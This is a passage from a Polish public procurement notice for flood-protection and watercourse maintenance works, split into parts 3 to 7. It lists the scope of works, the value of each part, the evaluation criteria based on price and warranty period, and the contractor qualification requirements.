Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> • Roboty należy poprzedzić pracami przygotowawczymi polegającymi na wytyczeniu linii brzegowej;<br/>• Wykonanie drogi technologicznej z płyt drogowych pełnych – dojazdu do zabudowywanych wyrw;<br/>• Wykoszenie porostów wraz z wygrabieniem;<br/>• Prace ziemne, grunt kat. III – wykopy pod projektowane ubezpieczenie. Nasypy, zabudowa wyrwy brzegowej i profilowanie docelowe linii brzegowej poprzez wykonanie odpowiednio uformowanego i zagęszczonego nasypu od projektowane ubezpieczenia brzegowe;<br/>• Plantowanie i obsiew skarpy;<br/>• Wykonanie podwodnego narzutu kamiennego ciężkiego;<br/>• Wykonanie nadwodnego narzutu kamiennego luzem z brzegu na odbudowanej skarpie z kamienia ciężkiego, grubość narzutu 0,5m, nachylenie skarpy 1:1,5, s=3m;<br/>• Naprawę dróg (uzupełnienie ubytków, wyrównanie po zakończeniu robót); </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 813005,53 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-07-01 do 2025-10-17</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena brutto (max 60%) – 60%<br/>kryterium okres gwarancji – 40%<br/>Kryterium 1 – „Cena” - będzie punktowane przez zamawiającego w oparciu <br/>o wyliczenie arytmetyczne: [najniższa cena brutto ze wszystkich ofert nie podlegających odrzuceniu : cena brutto oferty badanej] x 60 (waga), wg niżej podanego wzoru:<br/>C=(Najniższa cena ze wszystkich ofert nieodrzuconych)/(Cena oferty badanej)×60=ilość punktów<br/>Kryterium 2 – „Gwarancja”- będzie punktowane przez zamawiającego <br/>w oparciu o poniższą tabelkę:<br/>Dla części nr 3:<br/><br/>Lp.	Elementy podlegające ocenie	Liczba punktów<br/>1	Okres gwarancji	48 miesiący	40<br/>2 36 miesięcy	20<br/>3 24 miesięcy	0<br/>Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów za wszystkie kryteria z ofert nieodrzuconych, wg wzoru:<br/>Ł= C+G<br/>gdzie:<br/>Ł – łączna ilość punktów za wszystkie kryteria<br/>C – punkty przyznane w kryterium „Cena”<br/>G – punkty przyznane w kryterium „Gwarancja”<br/>2)	cena - 100 %<br/>UWAGA! Zamawiający może zastosować kryterium ceny jako jedyne kryterium oceny ofert albo jako kryterium o wadze przekraczającej 60%, jeżeli zostaną określone w opisie przedmiotu zamówienia wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia. (art. 246 ust. 2 ustawy Pzp).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> • Roboty pomiarowe przy liniowych robotach ziemnych – trasa drogi w terenie równinnym;<br/>• Cząstkowy remont dróg przywałowych z tłucznia kamiennego – wykonanie koryta/wyrównanie nawierzchni drogi istniejącej;<br/>• Nawierzchnia z tłucznia kamiennego – warstwa dolna z tłucznia – grubość po zagęszczeniu 20 cm;<br/>• Nawierzchnia z tłucznia kamiennego – warstwa górna z tłucznia – grubość po zagęszczeniu 10 cm;<br/>• Roboty ziemne wykonywane koparki przedsiębiernymi 0,40 m3 w ziemi kat. IV uprzednio zmagazynowanej w hałdach z transportem urobku samochodami samowyładowczymi na odległość do 1 km – wywóz nadmiaru gruntu z korytowania pasa drogi;<br/>• Transport lądowy kamienia, żwiru, pospółki na odległość do 0,5 km z załadunkiem mechanicznym. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 649493,51 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena brutto (max 60%) – 60%<br/>kryterium okres gwarancji – 40%<br/>Kryterium 1 – „Cena” - będzie punktowane przez zamawiającego w oparciu <br/>o wyliczenie arytmetyczne: [najniższa cena brutto ze wszystkich ofert nie podlegających odrzuceniu : cena brutto oferty badanej] x 60 (waga), wg niżej podanego wzoru:<br/>C=(Najniższa cena ze wszystkich ofert nieodrzuconych)/(Cena oferty badanej)×60=ilość punktów<br/>Kryterium 2 – „Gwarancja”- będzie punktowane przez zamawiającego <br/>w oparciu o poniższą tabelkę:<br/>Dla części nr 1-2, 4-7:<br/><br/>Lp.	Elementy podlegające ocenie	Liczba punktów<br/>1	Okres gwarancji	24 miesiące	40<br/>2 18 miesięcy	20<br/>3 12 miesięcy	0<br/>Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów za wszystkie kryteria z ofert nieodrzuconych, wg wzoru:<br/>Ł= C+G<br/>gdzie:<br/>Ł – łączna ilość punktów za wszystkie kryteria<br/>C – punkty przyznane w kryterium „Cena”<br/>G – punkty przyznane w kryterium „Gwarancja”<br/>2)	cena - 100 %<br/>UWAGA! Zamawiający może zastosować kryterium ceny jako jedyne kryterium oceny ofert albo jako kryterium o wadze przekraczającej 60%, jeżeli zostaną określone w opisie przedmiotu zamówienia wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia. (art. 246 ust. 2 ustawy Pzp).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> • Cząstkowy remont dróg przywałowych z tłucznia kamiennego – wykonywanie koryta;<br/>• Nawierzchnia z tłucznia kamiennego – grubość po zagęszczeniu 20 cm;<br/>• Wykonanie koryta pod czasowe drogi kołowe i place z płyt żelbetowych ubezpieczenie skarpy i stopy wału na długości 25 m i szer. 7,5 m przy dwóch śluzach wałowych Cisek i Dzielniczka;<br/>• Podsypka piaskowa z zagęszczeniem mechanicznym – 10 cm grubości warstwy po zagęszczeniu;<br/>• Układane czasowych dróg kołowych i placów z płyt żelbetowych pełnych o powierzchni 1 szt. ponad 3 m2. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 80532,75 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena brutto (max 60%) – 60%<br/>kryterium okres gwarancji – 40%<br/>Kryterium 1 – „Cena” - będzie punktowane przez zamawiającego w oparciu <br/>o wyliczenie arytmetyczne: [najniższa cena brutto ze wszystkich ofert nie podlegających odrzuceniu : cena brutto oferty badanej] x 60 (waga), wg niżej podanego wzoru:<br/>C=(Najniższa cena ze wszystkich ofert nieodrzuconych)/(Cena oferty badanej)×60=ilość punktów<br/>Kryterium 2 – „Gwarancja”- będzie punktowane przez zamawiającego <br/>w oparciu o poniższą tabelkę:<br/>Dla części nr 1-2, 4-7:<br/><br/>Lp.	Elementy podlegające ocenie	Liczba punktów<br/>1	Okres gwarancji	24 miesiące	40<br/>2 18 miesięcy	20<br/>3 12 miesięcy	0<br/>Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów za wszystkie kryteria z ofert nieodrzuconych, wg wzoru:<br/>Ł= C+G<br/>gdzie:<br/>Ł – łączna ilość punktów za wszystkie kryteria<br/>C – punkty przyznane w kryterium „Cena”<br/>G – punkty przyznane w kryterium „Gwarancja”<br/>2)	cena - 100 %<br/>UWAGA! Zamawiający może zastosować kryterium ceny jako jedyne kryterium oceny ofert albo jako kryterium o wadze przekraczającej 60%, jeżeli zostaną określone w opisie przedmiotu zamówienia wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia. (art. 246 ust. 2 ustawy Pzp).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> • Uzyskanie dostępności do terenu robót – koszt zajęć czasowych terenów obcych na potrzeby realizacji zadania teren wokół przepustów i śluz wałowych cieku Cisek, Dzielniczka i Koźlanka (9 obiektów);<br/>• Wykoszenie porostów gęstych twardych ze skarp cieku i terenu przyległego do obszaru robót na łącznej długości odcinków odpływowych poniżej przepustów oraz powyżej przepustów;<br/>• Ręczne ścinanie gęstych krzaków i podszycia przy użyciu rębaka;<br/>• Wykopy oraz przekopy wykonywane koparkami podsiębiernymi 0,40 m3 na odkład w gruncie kat. I-II. Grunt oblepiający naczynie robocze – ujęcie odkładów ziemnych i odpadów osadzonych w nieckach wlotowych i wylotowych przepustów śluz wałowych cieku Koźlanka, Cisek i Dzielniczka;<br/>• Wykopy oraz przekopy wykonywane koparkami podsiębiernymi 0,40 m3 na odkład w gruncie kat. I-II. Grunt oblepiający naczynie robocze – odtworzenie przekrojów poprzecznych odcinków odpływowych przy przepustach wałowych;<br/>• Wykopy rowów i kanałów po koparkach gr. nadmiaru gruntu do ścinania do 15 cm – kat. III (oczyszczenie elementów betonowych schodów przyczółków przy przepustach i śluzach wałowych, formowanie skarp w rejonie przepustów);<br/>• Demontaż zamknięć, piaskowanie elementów stalowych, malowanie klap zwrotnych oraz osadzenie ponowne klap szandorów na przyczółkach;<br/>• Udrożnienie hydrodynamiczne przy pomocy WUKO przewodów rurowych na przepustach wałowych;<br/>• Wykonanie narzutu kamiennego nadwodnego z kamienia ciężkiego lub średniego luzem z brzegu z wyładunkiem ręcznym przy wysokości burt do 0,61-1,50 m (zabudowa wyrw);<br/>• Transport lądowy kamienia, żwiru, pospółki na odległość do 0,5 km z załadunkiem mechanicznym. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 405796,29 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena brutto (max 60%) – 60%<br/>kryterium okres gwarancji – 40%<br/>Kryterium 1 – „Cena” - będzie punktowane przez zamawiającego w oparciu <br/>o wyliczenie arytmetyczne: [najniższa cena brutto ze wszystkich ofert nie podlegających odrzuceniu : cena brutto oferty badanej] x 60 (waga), wg niżej podanego wzoru:<br/>C=(Najniższa cena ze wszystkich ofert nieodrzuconych)/(Cena oferty badanej)×60=ilość punktów<br/>Kryterium 2 – „Gwarancja”- będzie punktowane przez zamawiającego <br/>w oparciu o poniższą tabelkę:<br/>Dla części nr 1-2, 4-7:<br/><br/>Lp.	Elementy podlegające ocenie	Liczba punktów<br/>1	Okres gwarancji	24 miesiące	40<br/>2 18 miesięcy	20<br/>3 12 miesięcy	0<br/>Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów za wszystkie kryteria z ofert nieodrzuconych, wg wzoru:<br/>Ł= C+G<br/>gdzie:<br/>Ł – łączna ilość punktów za wszystkie kryteria<br/>C – punkty przyznane w kryterium „Cena”<br/>G – punkty przyznane w kryterium „Gwarancja”<br/>2)	cena - 100 %<br/>UWAGA! Zamawiający może zastosować kryterium ceny jako jedyne kryterium oceny ofert albo jako kryterium o wadze przekraczającej 60%, jeżeli zostaną określone w opisie przedmiotu zamówienia wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia. (art. 246 ust. 2 ustawy Pzp).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> • Ręczne wykoszenie porostów gęstych twardych ze skarp;<br/>• Wygrabienie wykoszonych porostów ze skarp o szerokości ponad 2,0 m;<br/>• Uzyskanie dostępności do terenu robót – koszt zajęć czasowych gruntów obcych na potrzeby realizacji zadania w tym koszt zajęcia drogi gminnej;<br/>• Odtworzenie przekroju poprzecznego koryta cieku jako wykopy rowów i kanałów melioracyjnych oraz wykopy przy regulacji rzek wykonywane koparkami podsiębiernymi 0,25 m3 na odkład w gruncie kat. III o objętości do 0,8 m3/m. Grunt oblepiający naczynie robocze;<br/>• Wykopy rowów i kanałów po koparkach gr. nadmiaru gruntu do ścinania do 15 cm – kat. III przyjęto po 0,5 m i grubości 15 cm obustronnie, oczyszczenie ubezpieczeń betonowych w obrębie jazów, przepustów drogowych;<br/>• Rozplantowanie spycharkami ziemi wydobytej z wykopów liniowych do 1 m3 wzdłuż 1 m wykopu – kat. gruntu I-IV;<br/>• Ręczne ścinanie i karczowanie gęstych krzaków i podszycia;<br/>• Remont zamknięć i klapy zwrotnej, demontaż, piaskowanie elementów stalowych i konstrukcji betonowych jazów i zamknięć, malowanie elementów, uzupełnienie uszczelek gumowych zamknięć, wykonanie prac ślusarskich, wymiana balustrad, wymiana elementów drewnianych, wykonanie robót budowlanych na dwóch obiektach;<br/>• Wykopy oraz przekopy wykonywane koparkami przedsiębiernymi 0,40m3 na odkład w gruncie kat. III. Grunt oblepiający naczynie robocze, profilowanie skarp odcinka ujściowego cieku Kanał Azotowy oraz skarp rzeki Odry w miejscu ujścia, przyjęto 6m3/mb na długości 60 mb;<br/>• Umacnianie skarp wykopów i nasypów włókniną syntetyczną;<br/>• Transport lądowy kamienia, żwiru, pospółki na odległość do 0,5 km z załadunkiem mechanicznym;<br/>• Wykonanie narzutu kamiennego nadwodnego z kamienia ciężkiego lub średniego luzem z obiektu pływającego z wyładunkiem ręcznym przy wysokości burt do 0,60 m, zabudowa wyryw brzegowych rzeki Odry i wylotu cieku Kanał Azotowy;<br/>• Uprawa płużna w terenach zadarnionych płaskich. Technologia kołowa 1 etapowa. Warunki normalne. Gleby lekkie i średnie przy zastosowaniu ciągnika z agregatem (zestaw). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 406115,2 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena brutto (max 60%) – 60%<br/>kryterium okres gwarancji – 40%<br/>Kryterium 1 – „Cena” - będzie punktowane przez zamawiającego w oparciu <br/>o wyliczenie arytmetyczne: [najniższa cena brutto ze wszystkich ofert nie podlegających odrzuceniu : cena brutto oferty badanej] x 60 (waga), wg niżej podanego wzoru:<br/>C=(Najniższa cena ze wszystkich ofert nieodrzuconych)/(Cena oferty badanej)×60=ilość punktów<br/>Kryterium 2 – „Gwarancja”- będzie punktowane przez zamawiającego <br/>w oparciu o poniższą tabelkę:<br/>Dla części nr 1-2, 4-7:<br/><br/>Lp.	Elementy podlegające ocenie	Liczba punktów<br/>1	Okres gwarancji	24 miesiące	40<br/>2 18 miesięcy	20<br/>3 12 miesięcy	0<br/>Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów za wszystkie kryteria z ofert nieodrzuconych, wg wzoru:<br/>Ł= C+G<br/>gdzie:<br/>Ł – łączna ilość punktów za wszystkie kryteria<br/>C – punkty przyznane w kryterium „Cena”<br/>G – punkty przyznane w kryterium „Gwarancja”<br/>2)	cena - 100 %<br/>UWAGA! Zamawiający może zastosować kryterium ceny jako jedyne kryterium oceny ofert albo jako kryterium o wadze przekraczającej 60%, jeżeli zostaną określone w opisie przedmiotu zamówienia wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia. (art. 246 ust. 2 ustawy Pzp).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na potwierdzenie spełnienia warunków udziału Wykonawca złoży wykaz robót potwierdzający że w okresie ostatnich 5 lat od<br/>daty ogłoszenia niniejszego postępowania przetargowego, a jeżeli okres prowadzenia działalności jest krótszy, wykonał w<br/>tym okresie:<br/>dla części 1 - Zamawiający wymaga, aby Wykonawca wykazał co najmniej jedną pracę polegającą na wykonaniu usuwania szkód powodziowych, konserwacji, prac albo robót utrzymaniowych rzeki, cieku, rowu lub kanału o wartości nie mniejszej niż 100 000,00 zł brutto<br/>dla części 2 - Zamawiający wymaga, aby Wykonawca wykazał co najmniej jedną pracę polegającą na wykonaniu usuwania szkód powodziowych, konserwacji, prac albo robót utrzymaniowych rzeki, cieku, rowu lub kanału o wartości nie mniejszej niż 100 000,00 zł brutto.<br/>dla części 3 - Zamawiający wymaga, aby Wykonawca wykazał co najmniej jedną pracę polegającą na wykonaniu usuwania szkód powodziowych, konserwacji, prac albo robót utrzymaniowych rzeki, cieku, rowu lub kanału o wartości nie mniejszej niż 150 000,00 zł brutto.<br/>dla części 4- Zamawiający wymaga, aby Wykonawca wykazał co najmniej jedną robotę (potwierdzoną dowodami określającymi czy robota ta została wykonana w sposób należyty i prawidłowo ukończona) tożsamą z Przedmiarem robót lub/i Opisem Przedmiotu Zamówienia o wartości nie mniejszej niż 200 000,00 zł brutto.<br/>dla części 5- Zamawiający wymaga, aby Wykonawca wykazał co najmniej jedną robotę (potwierdzoną dowodami określającymi czy robota ta została wykonana w sposób należyty i prawidłowo ukończona) tożsamą z Przedmiarem robót lub/i Opisem Przedmiotu Zamówienia o wartości nie mniejszej niż 40 000,00 zł brutto.<br/>dla części 6 - Zamawiający wymaga, aby Wykonawca wykazał co najmniej jedną robotę (potwierdzoną dowodami określającymi czy robota ta została wykonana w sposób należyty i prawidłowo ukończona) tożsamą z Przedmiarem robót lub/i Opisem Przedmiotu Zamówienia o wartości nie mniejszej niż 150 000,00 zł brutto.<br/>dla części nr 7- Zamawiający wymaga, aby Wykonawca wykazał co najmniej jedną pracę polegającą na wykonaniu usuwania szkód powodziowych, konserwacji, prac albo robót utrzymaniowych rzeki, cieku, rowu lub kanału o wartości nie mniejszej niż 200 000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. oświadczenie wykonawcy<br/>o aktualności informacji zawartych w oświadczeniu,<br/>w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, zgodnego z wzorem stanowiącym Załącznik nr<br/>3 do SWZ.<br/>2. odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, sporządzone nie wcześniej niż<br/>3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku<br/>podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp<br/>3. oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia<br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył<br/>odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej zgodnego z wzorem stanowiącym Załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz robót (zgodny w treści z Załącznikiem Nr 5 do SWZ) wykonanych nie wcześniej niż<br/>a. w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów<br/>określających, czy te prace zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego prace zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie<br/>ostatnich 3 miesięcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Kosztorys szczegółowy, Zaświadczenie o przeprowadzeniu wizji lokalnej dla części 3-7. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span 